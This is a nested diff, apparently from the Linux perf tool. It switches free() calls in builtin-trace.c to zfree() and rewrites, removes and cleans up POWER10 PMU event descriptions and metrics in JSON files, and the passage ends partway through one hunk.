+diff --git a/tools/perf/builtin-trace.c b/tools/perf/builtin-trace.c
+index 97b17f8941dc0..93dab6423a048 100644
+--- a/tools/perf/builtin-trace.c
++++ b/tools/perf/builtin-trace.c
+@@ -2293,7 +2293,7 @@ static void syscall__exit(struct syscall *sc)
+ 	if (!sc)
+ 		return;
+ 
+-	free(sc->arg_fmt);
++	zfree(&sc->arg_fmt);
+ }
+ 
+ static int trace__sys_enter(struct trace *trace, struct evsel *evsel,
+@@ -3124,13 +3124,8 @@ static void evlist__free_syscall_tp_fields(struct evlist *evlist)
+ 	struct evsel *evsel;
+ 
+ 	evlist__for_each_entry(evlist, evsel) {
+-		struct evsel_trace *et = evsel->priv;
+-
+-		if (!et || !evsel->tp_format || strcmp(evsel->tp_format->system, "syscalls"))
+-			continue;
+-
+-		free(et->fmt);
+-		free(et);
++		evsel_trace__delete(evsel->priv);
++		evsel->priv = NULL;
+ 	}
+ }
+ 
+@@ -4765,11 +4760,11 @@ static void trace__exit(struct trace *trace)
+ 	int i;
+ 
+ 	strlist__delete(trace->ev_qualifier);
+-	free(trace->ev_qualifier_ids.entries);
++	zfree(&trace->ev_qualifier_ids.entries);
+ 	if (trace->syscalls.table) {
+ 		for (i = 0; i <= trace->sctbl->syscalls.max_id; i++)
+ 			syscall__exit(&trace->syscalls.table[i]);
+-		free(trace->syscalls.table);
++		zfree(&trace->syscalls.table);
+ 	}
+ 	syscalltbl__delete(trace->sctbl);
+ 	zfree(&trace->perfconfig_events);
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/cache.json b/tools/perf/pmu-events/arch/powerpc/power10/cache.json
+index 605be14f441c8..9cb929bb64afd 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/cache.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/cache.json
+@@ -17,7 +17,7 @@
+   {
+     "EventCode": "0x34056",
+     "EventName": "PM_EXEC_STALL_LOAD_FINISH",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was finishing a load after its data was reloaded from a data source beyond the local L1; cycles in which the LSU was processing an L1-hit; cycles in which the NTF instruction merged with another load in the LMQ; cycles in which the NTF instruction is waiting for a data reload for a load miss, but the data comes back with a non-NTF instruction."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was finishing a load after its data was reloaded from a data source beyond the local L1; cycles in which the LSU was processing an L1-hit; cycles in which the next-to-finish (NTF) instruction merged with another load in the LMQ; cycles in which the NTF instruction is waiting for a data reload for a load miss, but the data comes back with a non-NTF instruction."
+   },
+   {
+     "EventCode": "0x3006C",
+@@ -27,7 +27,7 @@
+   {
+     "EventCode": "0x300F4",
+     "EventName": "PM_RUN_INST_CMPL_CONC",
+-    "BriefDescription": "PowerPC instructions completed by this thread when all threads in the core had the run-latch set."
++    "BriefDescription": "PowerPC instruction completed by this thread when all threads in the core had the run-latch set."
+   },
+   {
+     "EventCode": "0x4C016",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/floating_point.json b/tools/perf/pmu-events/arch/powerpc/power10/floating_point.json
+deleted file mode 100644
+index 54acb55e2c8c6..0000000000000
+--- a/tools/perf/pmu-events/arch/powerpc/power10/floating_point.json
++++ /dev/null
+@@ -1,7 +0,0 @@
+-[
+-  {
+-    "EventCode": "0x4016E",
+-    "EventName": "PM_THRESH_NOT_MET",
+-    "BriefDescription": "Threshold counter did not meet threshold."
+-  }
+-]
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/frontend.json b/tools/perf/pmu-events/arch/powerpc/power10/frontend.json
+index 558f9530f54ec..61e9e0222c873 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/frontend.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/frontend.json
+@@ -7,7 +7,7 @@
+   {
+     "EventCode": "0x10006",
+     "EventName": "PM_DISP_STALL_HELD_OTHER_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch for any other reason."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch for any other reason."
+   },
+   {
+     "EventCode": "0x10010",
+@@ -32,12 +32,12 @@
+   {
+     "EventCode": "0x1D05E",
+     "EventName": "PM_DISP_STALL_HELD_HALT_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because of power management."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because of power management."
+   },
+   {
+     "EventCode": "0x1E050",
+     "EventName": "PM_DISP_STALL_HELD_STF_MAPPER_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because the STF mapper/SRB was full. Includes GPR (count, link, tar), VSR, VMR, FPR."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because the STF mapper/SRB was full. Includes GPR (count, link, tar), VSR, VMR, FPR."
+   },
+   {
+     "EventCode": "0x1F054",
+@@ -67,7 +67,7 @@
+   {
+     "EventCode": "0x100F6",
+     "EventName": "PM_IERAT_MISS",
+-    "BriefDescription": "IERAT Reloaded to satisfy an IERAT miss. All page sizes are counted by this event."
++    "BriefDescription": "IERAT Reloaded to satisfy an IERAT miss. All page sizes are counted by this event. This event only counts instruction demand access."
+   },
+   {
+     "EventCode": "0x100F8",
+@@ -77,7 +77,7 @@
+   {
+     "EventCode": "0x20006",
+     "EventName": "PM_DISP_STALL_HELD_ISSQ_FULL_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch due to Issue queue full. Includes issue queue and branch queue."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch due to Issue queue full. Includes issue queue and branch queue."
+   },
+   {
+     "EventCode": "0x20114",
+@@ -102,7 +102,7 @@
+   {
+     "EventCode": "0x2D01A",
+     "EventName": "PM_DISP_STALL_IC_MISS",
+-    "BriefDescription": "Cycles when dispatch was stalled for this thread due to an Icache Miss."
++    "BriefDescription": "Cycles when dispatch was stalled for this thread due to an instruction cache miss."
+   },
+   {
+     "EventCode": "0x2E018",
+@@ -112,7 +112,7 @@
+   {
+     "EventCode": "0x2E01A",
+     "EventName": "PM_DISP_STALL_HELD_XVFC_MAPPER_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because the XVFC mapper/SRB was full."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because the XVFC mapper/SRB was full."
+   },
+   {
+     "EventCode": "0x2C142",
+@@ -137,7 +137,7 @@
+   {
+     "EventCode": "0x30004",
+     "EventName": "PM_DISP_STALL_FLUSH",
+-    "BriefDescription": "Cycles when dispatch was stalled because of a flush that happened to an instruction(s) that was not yet NTC. PM_EXEC_STALL_NTC_FLUSH only includes instructions that were flushed after becoming NTC."
++    "BriefDescription": "Cycles when dispatch was stalled because of a flush that happened to an instruction(s) that was not yet next-to-complete (NTC). PM_EXEC_STALL_NTC_FLUSH only includes instructions that were flushed after becoming NTC."
+   },
+   {
+     "EventCode": "0x3000A",
+@@ -157,7 +157,7 @@
+   {
+     "EventCode": "0x30018",
+     "EventName": "PM_DISP_STALL_HELD_SCOREBOARD_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch while waiting on the Scoreboard. This event combines VSCR and FPSCR together."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch while waiting on the Scoreboard. This event combines VSCR and FPSCR together."
+   },
+   {
+     "EventCode": "0x30026",
+@@ -182,7 +182,7 @@
+   {
+     "EventCode": "0x3D05C",
+     "EventName": "PM_DISP_STALL_HELD_RENAME_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because the mapper/SRB was full. Includes GPR (count, link, tar), VSR, VMR, FPR and XVFC."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because the mapper/SRB was full. Includes GPR (count, link, tar), VSR, VMR, FPR and XVFC."
+   },
+   {
+     "EventCode": "0x3E052",
+@@ -192,7 +192,7 @@
+   {
+     "EventCode": "0x3E054",
+     "EventName": "PM_LD_MISS_L1",
+-    "BriefDescription": "Load Missed L1, counted at execution time (can be greater than loads finished). LMQ merges are not included in this count. i.e. if a load instruction misses on an address that is already allocated on the LMQ, this event will not increment for that load). Note that this count is per slice, so if a load spans multiple slices this event will increment multiple times for a single load."
++    "BriefDescription": "Load missed L1, counted at finish time. LMQ merges are not included in this count. i.e. if a load instruction misses on an address that is already allocated on the LMQ, this event will not increment for that load). Note that this count is per slice, so if a load spans multiple slices this event will increment multiple times for a single load."
+   },
+   {
+     "EventCode": "0x301EA",
+@@ -202,7 +202,7 @@
+   {
+     "EventCode": "0x300FA",
+     "EventName": "PM_INST_FROM_L3MISS",
+-    "BriefDescription": "The processor's instruction cache was reloaded from a source other than the local core's L1, L2, or L3 due to a demand miss."
++    "BriefDescription": "The processor's instruction cache was reloaded from beyond the local core's L3 due to a demand miss."
+   },
+   {
+     "EventCode": "0x40006",
+@@ -232,16 +232,16 @@
+   {
+     "EventCode": "0x4E01A",
+     "EventName": "PM_DISP_STALL_HELD_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch for any reason."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch for any reason."
+   },
+   {
+     "EventCode": "0x4003C",
+     "EventName": "PM_DISP_STALL_HELD_SYNC_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because of a synchronizing instruction that requires the ICT to be empty before dispatch."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because of a synchronizing instruction that requires the ICT to be empty before dispatch."
+   },
+   {
+     "EventCode": "0x44056",
+     "EventName": "PM_VECTOR_ST_CMPL",
+-    "BriefDescription": "Vector store instructions completed."
++    "BriefDescription": "Vector store instruction completed."
+   }
+ ]
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/marked.json b/tools/perf/pmu-events/arch/powerpc/power10/marked.json
+index 58b5dfe3a2731..f2436fc5537ce 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/marked.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/marked.json
+@@ -19,11 +19,6 @@
+     "EventName": "PM_MRK_BR_TAKEN_CMPL",
+     "BriefDescription": "Marked Branch Taken instruction completed."
+   },
+-  {
+-    "EventCode": "0x20112",
+-    "EventName": "PM_MRK_NTF_FIN",
+-    "BriefDescription": "The marked instruction became the oldest in the pipeline before it finished. It excludes instructions that finish at dispatch."
+-  },
+   {
+     "EventCode": "0x2C01C",
+     "EventName": "PM_EXEC_STALL_DMISS_OFF_CHIP",
+@@ -62,17 +57,12 @@
+   {
+     "EventCode": "0x200FD",
+     "EventName": "PM_L1_ICACHE_MISS",
+-    "BriefDescription": "Demand iCache Miss."
+-  },
+-  {
+-    "EventCode": "0x30130",
+-    "EventName": "PM_MRK_INST_FIN",
+-    "BriefDescription": "marked instruction finished. Excludes instructions that finish at dispatch. Note that stores always finish twice since the address gets issued to the LSU and the data gets issued to the VSU."
++    "BriefDescription": "Demand instruction cache miss."
+   },
+   {
+     "EventCode": "0x34146",
+     "EventName": "PM_MRK_LD_CMPL",
+-    "BriefDescription": "Marked loads completed."
++    "BriefDescription": "Marked load instruction completed."
+   },
+   {
+     "EventCode": "0x3E158",
+@@ -82,12 +72,12 @@
+   {
+     "EventCode": "0x3E15A",
+     "EventName": "PM_MRK_ST_FIN",
+-    "BriefDescription": "The marked instruction was a store of any kind."
++    "BriefDescription": "Marked store instruction finished."
+   },
+   {
+     "EventCode": "0x30068",
+     "EventName": "PM_L1_ICACHE_RELOADED_PREF",
+-    "BriefDescription": "Counts all Icache prefetch reloads ( includes demand turned into prefetch)."
++    "BriefDescription": "Counts all instruction cache prefetch reloads (includes demand turned into prefetch)."
+   },
+   {
+     "EventCode": "0x301E4",
+@@ -102,12 +92,12 @@
+   {
+     "EventCode": "0x300FE",
+     "EventName": "PM_DATA_FROM_L3MISS",
+-    "BriefDescription": "The processor's data cache was reloaded from a source other than the local core's L1, L2, or L3 due to a demand miss."
++    "BriefDescription": "The processor's L1 data cache was reloaded from beyond the local core's L3 due to a demand miss."
+   },
+   {
+     "EventCode": "0x40012",
+     "EventName": "PM_L1_ICACHE_RELOADED_ALL",
+-    "BriefDescription": "Counts all Icache reloads includes demand, prefetch, prefetch turned into demand and demand turned into prefetch."
++    "BriefDescription": "Counts all instruction cache reloads includes demand, prefetch, prefetch turned into demand and demand turned into prefetch."
+   },
+   {
+     "EventCode": "0x40134",
+@@ -117,22 +107,22 @@
+   {
+     "EventCode": "0x4505A",
+     "EventName": "PM_SP_FLOP_CMPL",
+-    "BriefDescription": "Single Precision floating point instructions completed."
++    "BriefDescription": "Single Precision floating point instruction completed."
+   },
+   {
+     "EventCode": "0x4D058",
+     "EventName": "PM_VECTOR_FLOP_CMPL",
+-    "BriefDescription": "Vector floating point instructions completed."
++    "BriefDescription": "Vector floating point instruction completed."
+   },
+   {
+     "EventCode": "0x4D05A",
+     "EventName": "PM_NON_MATH_FLOP_CMPL",
+-    "BriefDescription": "Non Math instructions completed."
++    "BriefDescription": "Non Math instruction completed."
+   },
+   {
+     "EventCode": "0x401E0",
+     "EventName": "PM_MRK_INST_CMPL",
+-    "BriefDescription": "marked instruction completed."
++    "BriefDescription": "Marked instruction completed."
+   },
+   {
+     "EventCode": "0x400FE",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/memory.json b/tools/perf/pmu-events/arch/powerpc/power10/memory.json
+index 843b51f531e95..c4c10ca98cad7 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/memory.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/memory.json
+@@ -47,7 +47,7 @@
+   {
+     "EventCode": "0x10062",
+     "EventName": "PM_LD_L3MISS_PEND_CYC",
+-    "BriefDescription": "Cycles L3 miss was pending for this thread."
++    "BriefDescription": "Cycles in which an L3 miss was pending for this thread."
+   },
+   {
+     "EventCode": "0x20010",
+@@ -132,7 +132,7 @@
+   {
+     "EventCode": "0x300FC",
+     "EventName": "PM_DTLB_MISS",
+-    "BriefDescription": "The DPTEG required for the load/store instruction in execution was missing from the TLB. It includes pages of all sizes for demand and prefetch activity."
++    "BriefDescription": "The DPTEG required for the load/store instruction in execution was missing from the TLB. This event only counts for demand misses."
+   },
+   {
+     "EventCode": "0x4D02C",
+@@ -142,7 +142,7 @@
+   {
+     "EventCode": "0x4003E",
+     "EventName": "PM_LD_CMPL",
+-    "BriefDescription": "Loads completed."
++    "BriefDescription": "Load instruction completed."
+   },
+   {
+     "EventCode": "0x4C040",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/metrics.json b/tools/perf/pmu-events/arch/powerpc/power10/metrics.json
+index b57526fa44f2d..6e76f65c314ce 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/metrics.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/metrics.json
+@@ -453,12 +453,6 @@
+         "MetricGroup": "General",
+         "MetricName": "LOADS_PER_INST"
+     },
+-    {
+-        "BriefDescription": "Average number of finished stores per completed instruction",
+-        "MetricExpr": "PM_ST_FIN / PM_RUN_INST_CMPL",
+-        "MetricGroup": "General",
+-        "MetricName": "STORES_PER_INST"
+-    },
+     {
+         "BriefDescription": "Percentage of demand loads that reloaded from beyond the L2 per completed instruction",
+         "MetricExpr": "PM_DATA_FROM_L2MISS / PM_RUN_INST_CMPL * 100",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/others.json b/tools/perf/pmu-events/arch/powerpc/power10/others.json
+index 7d0de1a2860b4..36c5bbc64c3be 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/others.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/others.json
+@@ -2,12 +2,12 @@
+   {
+     "EventCode": "0x10016",
+     "EventName": "PM_VSU0_ISSUE",
+-    "BriefDescription": "VSU instructions issued to VSU pipe 0."
++    "BriefDescription": "VSU instruction issued to VSU pipe 0."
+   },
+   {
+     "EventCode": "0x1001C",
+     "EventName": "PM_ULTRAVISOR_INST_CMPL",
+-    "BriefDescription": "PowerPC instructions that completed while the thread was in ultravisor state."
++    "BriefDescription": "PowerPC instruction completed while the thread was in ultravisor state."
+   },
+   {
+     "EventCode": "0x100F0",
+@@ -17,23 +17,18 @@
+   {
+     "EventCode": "0x10134",
+     "EventName": "PM_MRK_ST_DONE_L2",
+-    "BriefDescription": "Marked stores completed in L2 (RC machine done)."
++    "BriefDescription": "Marked store completed in L2."
+   },
+   {
+     "EventCode": "0x1505E",
+     "EventName": "PM_LD_HIT_L1",
+-    "BriefDescription": "Loads that finished without experiencing an L1 miss."
++    "BriefDescription": "Load finished without experiencing an L1 miss."
+   },
+   {
+     "EventCode": "0x1F056",
+     "EventName": "PM_DISP_SS0_2_INSTR_CYC",
+     "BriefDescription": "Cycles in which Superslice 0 dispatches either 1 or 2 instructions."
+   },
+-  {
+-    "EventCode": "0x1F15C",
+-    "EventName": "PM_MRK_STCX_L2_CYC",
+-    "BriefDescription": "Cycles spent in the nest portion of a marked Stcx instruction. It starts counting when the operation starts to drain to the L2 and it stops counting when the instruction retires from the Instruction Completion Table (ICT) in the Instruction Sequencing Unit (ISU)."
+-  },
+   {
+     "EventCode": "0x10066",
+     "EventName": "PM_ADJUNCT_CYC",
+@@ -42,7 +37,7 @@
+   {
+     "EventCode": "0x101E4",
+     "EventName": "PM_MRK_L1_ICACHE_MISS",
+-    "BriefDescription": "Marked Instruction suffered an icache Miss."
++    "BriefDescription": "Marked instruction suffered an instruction cache miss."
+   },
+   {
+     "EventCode": "0x101EA",
+@@ -72,7 +67,7 @@
+   {
+     "EventCode": "0x2E010",
+     "EventName": "PM_ADJUNCT_INST_CMPL",
+-    "BriefDescription": "PowerPC instructions that completed while the thread is in Adjunct state."
++    "BriefDescription": "PowerPC instruction completed while the thread was in Adjunct state."
+   },
+   {
+     "EventCode": "0x2E014",
+@@ -122,7 +117,7 @@
+   {
+     "EventCode": "0x201E4",
+     "EventName": "PM_MRK_DATA_FROM_L3MISS",
+-    "BriefDescription": "The processor's data cache was reloaded from a source other than the local core's L1, L2, or L3 due to a demand miss for a marked load."
++    "BriefDescription": "The processor's L1 data cache was reloaded from beyond the local core's L3 due to a demand miss for a marked instruction."
+   },
+   {
+     "EventCode": "0x201E8",
+@@ -132,17 +127,17 @@
+   {
+     "EventCode": "0x200F2",
+     "EventName": "PM_INST_DISP",
+-    "BriefDescription": "PowerPC instructions dispatched."
++    "BriefDescription": "PowerPC instruction dispatched."
+   },
+   {
+     "EventCode": "0x30132",
+     "EventName": "PM_MRK_VSU_FIN",
+-    "BriefDescription": "VSU marked instructions finished. Excludes simple FX instructions issued to the Store Unit."
++    "BriefDescription": "VSU marked instruction finished. Excludes simple FX instructions issued to the Store Unit."
+   },
+   {
+     "EventCode": "0x30038",
+     "EventName": "PM_EXEC_STALL_DMISS_LMEM",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was waiting for a load miss to resolve from the local memory, local OpenCapp cache, or local OpenCapp memory."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was waiting for a load miss to resolve from the local memory, local OpenCAPI cache, or local OpenCAPI memory."
+   },
+   {
+     "EventCode": "0x3F04A",
+@@ -152,12 +147,12 @@
+   {
+     "EventCode": "0x3405A",
+     "EventName": "PM_PRIVILEGED_INST_CMPL",
+-    "BriefDescription": "PowerPC Instructions that completed while the thread is in Privileged state."
++    "BriefDescription": "PowerPC instruction completed while the thread was in Privileged state."
+   },
+   {
+     "EventCode": "0x3F150",
+     "EventName": "PM_MRK_ST_DRAIN_CYC",
+-    "BriefDescription": "cycles to drain st from core to L2."
++    "BriefDescription": "Cycles in which the marked store drained from the core to the L2."
+   },
+   {
+     "EventCode": "0x3F054",
+@@ -182,7 +177,7 @@
+   {
+     "EventCode": "0x4001C",
+     "EventName": "PM_VSU_FIN",
+-    "BriefDescription": "VSU instructions finished."
++    "BriefDescription": "VSU instruction finished."
+   },
+   {
+     "EventCode": "0x4C01A",
+@@ -197,7 +192,7 @@
+   {
+     "EventCode": "0x4D022",
+     "EventName": "PM_HYPERVISOR_INST_CMPL",
+-    "BriefDescription": "PowerPC instructions that completed while the thread is in hypervisor state."
++    "BriefDescription": "PowerPC instruction completed while the thread was in hypervisor state."
+   },
+   {
+     "EventCode": "0x4D026",
+@@ -212,32 +207,32 @@
+   {
+     "EventCode": "0x40030",
+     "EventName": "PM_INST_FIN",
+-    "BriefDescription": "Instructions finished."
++    "BriefDescription": "Instruction finished."
+   },
+   {
+     "EventCode": "0x44146",
+     "EventName": "PM_MRK_STCX_CORE_CYC",
+-    "BriefDescription": "Cycles spent in the core portion of a marked Stcx instruction. It starts counting when the instruction is decoded and stops counting when it drains into the L2."
++    "BriefDescription": "Cycles spent in the core portion of a marked STCX instruction. It starts counting when the instruction is decoded and stops counting when it drains into the L2."
+   },
+   {
+     "EventCode": "0x44054",
+     "EventName": "PM_VECTOR_LD_CMPL",
+-    "BriefDescription": "Vector load instructions completed."
++    "BriefDescription": "Vector load instruction completed."
+   },
+   {
+     "EventCode": "0x45054",
+     "EventName": "PM_FMA_CMPL",
+-    "BriefDescription": "Two floating point instructions completed (FMA class of instructions: fmadd, fnmadd, fmsub, fnmsub). Scalar instructions only."
++    "BriefDescription": "Two floating point instruction completed (FMA class of instructions: fmadd, fnmadd, fmsub, fnmsub). Scalar instructions only."
+   },
+   {
+     "EventCode": "0x45056",
+     "EventName": "PM_SCALAR_FLOP_CMPL",
+-    "BriefDescription": "Scalar floating point instructions completed."
++    "BriefDescription": "Scalar floating point instruction completed."
+   },
+   {
+     "EventCode": "0x4505C",
+     "EventName": "PM_MATH_FLOP_CMPL",
+-    "BriefDescription": "Math floating point instructions completed."
++    "BriefDescription": "Math floating point instruction completed."
+   },
+   {
+     "EventCode": "0x4D05E",
+@@ -252,21 +247,21 @@
+   {
+     "EventCode": "0x401E6",
+     "EventName": "PM_MRK_INST_FROM_L3MISS",
+-    "BriefDescription": "The processor's instruction cache was reloaded from a source other than the local core's L1, L2, or L3 due to a demand miss for a marked instruction."
++    "BriefDescription": "The processor's instruction cache was reloaded from beyond the local core's L3 due to a demand miss for a marked instruction."
+   },
+   {
+     "EventCode": "0x401E8",
+     "EventName": "PM_MRK_DATA_FROM_L2MISS",
+-    "BriefDescription": "The processor's data cache was reloaded from a source other than the local core's L1 or L2 due to a demand miss for a marked load."
++    "BriefDescription": "The processor's L1 data cache was reloaded from a source beyond the local core's L2 due to a demand miss for a marked instruction."
+   },
+   {
+     "EventCode": "0x400F0",
+     "EventName": "PM_LD_DEMAND_MISS_L1_FIN",
+-    "BriefDescription": "Load Missed L1, counted at finish time."
++    "BriefDescription": "Load missed L1, counted at finish time."
+   },
+   {
+     "EventCode": "0x400FA",
+     "EventName": "PM_RUN_INST_CMPL",
+-    "BriefDescription": "Completed PowerPC instructions gated by the run latch."
++    "BriefDescription": "PowerPC instruction completed while the run latch is set."
+   }
+ ]
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/pipeline.json b/tools/perf/pmu-events/arch/powerpc/power10/pipeline.json
+index b8aded6045faa..799893c56f32b 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/pipeline.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/pipeline.json
+@@ -2,7 +2,7 @@
+   {
+     "EventCode": "0x100FE",
+     "EventName": "PM_INST_CMPL",
+-    "BriefDescription": "PowerPC instructions completed."
++    "BriefDescription": "PowerPC instruction completed."
+   },
+   {
+     "EventCode": "0x1000C",
+@@ -12,7 +12,7 @@
+   {
+     "EventCode": "0x1000E",
+     "EventName": "PM_MMA_ISSUED",
+-    "BriefDescription": "MMA instructions issued."
++    "BriefDescription": "MMA instruction issued."
+   },
+   {
+     "EventCode": "0x10012",
+@@ -107,7 +107,7 @@
+   {
+     "EventCode": "0x2D012",
+     "EventName": "PM_VSU1_ISSUE",
+-    "BriefDescription": "VSU instructions issued to VSU pipe 1."
++    "BriefDescription": "VSU instruction issued to VSU pipe 1."
+   },
+   {
+     "EventCode": "0x2D018",
+@@ -122,7 +122,7 @@
+   {
+     "EventCode": "0x2E01E",
+     "EventName": "PM_EXEC_STALL_NTC_FLUSH",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was executing in any unit before it was flushed. Note that if the flush of the oldest instruction happens after finish, the cycles from dispatch to issue will be included in PM_DISP_STALL and the cycles from issue to finish will be included in PM_EXEC_STALL and its corresponding children. This event will also count cycles when the previous NTF instruction is still completing and the new NTF instruction is stalled at dispatch."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was executing in any unit before it was flushed. Note that if the flush of the oldest instruction happens after finish, the cycles from dispatch to issue will be included in PM_DISP_STALL and the cycles from issue to finish will be included in PM_EXEC_STALL and its corresponding children. This event will also count cycles when the previous next-to-finish (NTF) instruction is still completing and the new NTF instruction is stalled at dispatch."
+   },
+   {
+     "EventCode": "0x2013C",
+@@ -137,7 +137,7 @@
+   {
+     "EventCode": "0x201E2",
+     "EventName": "PM_MRK_LD_MISS_L1",
+-    "BriefDescription": "Marked DL1 Demand Miss counted at finish time."
++    "BriefDescription": "Marked demand data load miss counted at finish time."
+   },
+   {
+     "EventCode": "0x200F4",
+@@ -172,7 +172,7 @@
+   {
+     "EventCode": "0x30028",
+     "EventName": "PM_CMPL_STALL_MEM_ECC",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was waiting for the non-speculative finish of either a stcx waiting for its result or a load waiting for non-critical sectors of data and ECC."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was waiting for the non-speculative finish of either a STCX waiting for its result or a load waiting for non-critical sectors of data and ECC."
+   },
+   {
+     "EventCode": "0x30036",
+@@ -187,17 +187,12 @@
+   {
+     "EventCode": "0x3F044",
+     "EventName": "PM_VSU2_ISSUE",
+-    "BriefDescription": "VSU instructions issued to VSU pipe 2."
++    "BriefDescription": "VSU instruction issued to VSU pipe 2."
+   },
+   {
+     "EventCode": "0x30058",
+     "EventName": "PM_TLBIE_FIN",
+-    "BriefDescription": "TLBIE instructions finished in the LSU. Two TLBIEs can finish each cycle. All will be counted."
+-  },
+-  {
+-    "EventCode": "0x3D058",
+-    "EventName": "PM_SCALAR_FSQRT_FDIV_ISSUE",
+-    "BriefDescription": "Scalar versions of four floating point operations: fdiv,fsqrt (xvdivdp, xvdivsp, xvsqrtdp, xvsqrtsp)."
++    "BriefDescription": "TLBIE instruction finished in the LSU. Two TLBIEs can finish each cycle. All will be counted."
+   },
+   {
+     "EventCode": "0x30066",
+@@ -252,7 +247,7 @@
+   {
+     "EventCode": "0x4E012",
+     "EventName": "PM_EXEC_STALL_UNKNOWN",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline completed without an ntf_type pulse. The ntf_pulse was missed by the ISU because the NTF finishes and completions came too close together."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline completed without an ntf_type pulse. The ntf_pulse was missed by the ISU because the next-to-finish (NTF) instruction finishes and completions came too close together."
+   },
+   {
+     "EventCode": "0x4D020",
+@@ -267,12 +262,7 @@
+   {
+     "EventCode": "0x45058",
+     "EventName": "PM_IC_MISS_CMPL",
+-    "BriefDescription": "Non-speculative icache miss, counted at completion."
+-  },
+-  {
+-    "EventCode": "0x4D050",
+-    "EventName": "PM_VSU_NON_FLOP_CMPL",
+-    "BriefDescription": "Non-floating point VSU instructions completed."
++    "BriefDescription": "Non-speculative instruction cache miss, counted at completion."
+   },
+   {
+     "EventCode": "0x4D052",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/pmc.json b/tools/perf/pmu-events/arch/powerpc/power10/pmc.json
+index b5d1bd39cfb22..364fedbfb490b 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/pmc.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/pmc.json
+@@ -12,11 +12,11 @@
+   {
+     "EventCode": "0x45052",
+     "EventName": "PM_4FLOP_CMPL",
+-    "BriefDescription": "Four floating point instructions completed (fadd, fmul, fsub, fcmp, fsel, fabs, fnabs, fres, fsqrte, fneg)."
++    "BriefDescription": "Four floating point instruction completed (fadd, fmul, fsub, fcmp, fsel, fabs, fnabs, fres, fsqrte, fneg)."
+   },
+   {
+     "EventCode": "0x4D054",
+     "EventName": "PM_8FLOP_CMPL",
+-    "BriefDescription": "Four Double Precision vector instructions completed."
++    "BriefDescription": "Four Double Precision vector instruction completed."
+   }
+ ]
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/translation.json b/tools/perf/pmu-events/arch/powerpc/power10/translation.json
+index db3766dca07c5..961e2491e73f6 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/translation.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/translation.json
+@@ -4,11 +4,6 @@
+     "EventName": "PM_MRK_START_PROBE_NOP_CMPL",
+     "BriefDescription": "Marked Start probe nop (AND R0,R0,R0) completed."
+   },
+-  {
+-    "EventCode": "0x20016",
+-    "EventName": "PM_ST_FIN",
+-    "BriefDescription": "Store finish count. Includes speculative activity."
+-  },
+   {
+     "EventCode": "0x20018",
+     "EventName": "PM_ST_FWD",
+@@ -17,7 +12,7 @@
+   {
+     "EventCode": "0x2011C",
+     "EventName": "PM_MRK_NTF_CYC",
+-    "BriefDescription": "Cycles during which the marked instruction is the oldest in the pipeline (NTF or NTC)."
++    "BriefDescription": "Cycles in which the marked instruction is the oldest in the pipeline (next-to-finish or next-to-complete)."
+   },
+   {
+     "EventCode": "0x2E01C",
+@@ -37,7 +32,7 @@
+   {
+     "EventCode": "0x200FE",
+     "EventName": "PM_DATA_FROM_L2MISS",
+-    "BriefDescription": "The processor's data cache was reloaded from a source other than the local core's L1 or L2 due to a demand miss."
